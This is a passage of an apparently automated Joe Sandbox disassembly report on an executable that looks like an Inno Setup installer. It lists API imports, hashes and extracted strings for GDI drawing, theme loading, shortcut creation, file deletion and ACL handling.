                                                                                        • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                        • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                        • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                        • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                        • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                        • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                        APIs
                                                                                        • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptFour
                                                                                        • String ID:
                                                                                        • API String ID: 2153018856-0
                                                                                        • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                        • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                        • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                        • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                        APIs
                                                                                        • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptFour
                                                                                        • String ID:
                                                                                        • API String ID: 2153018856-0
                                                                                        • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                        • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                        • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                        • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3556712189.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3556688410.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3556756676.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_10000000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                        • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                        • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                        • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3556712189.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3556688410.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3556756676.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_10000000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                        • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                        • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                          • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                        • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                        • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                        • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                        • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                        • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                        • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                        • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                        • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                        • API String ID: 1968650500-2910565190
                                                                                        • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                        • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                        • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                        • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0041CA40
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                        • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                        • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                        • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                        • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                        • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                        • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                        • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                        • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                        • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                        • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                        • String ID:
                                                                                        • API String ID: 269503290-0
                                                                                        • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                        • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                        • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                        • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                        • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                        Strings
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                        • {pf32}\, xrefs: 0045671E
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                        • IPropertyStore::Commit, xrefs: 004568E3
                                                                                        • CoCreateInstance, xrefs: 004566AF
                                                                                        • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                        • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                        • IPersistFile::Save, xrefs: 00456962
                                                                                        • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstance$FreeString
                                                                                        • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                        • API String ID: 308859552-2363233914
                                                                                        • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                        • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                        • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                        • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                        • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                        • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                        • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                        • API String ID: 2000705611-3672972446
                                                                                        • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                        • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                        • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                        • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                        • API String ID: 1452528299-3112430753
                                                                                        • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                        • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                        • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                        • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                        • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                        • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                          • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                        • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                        • API String ID: 59345061-4263478283
                                                                                        • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                        • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                        • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                        • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                        APIs
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                        • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                        • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                        • GetDC.USER32(00000000), ref: 0041B402
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
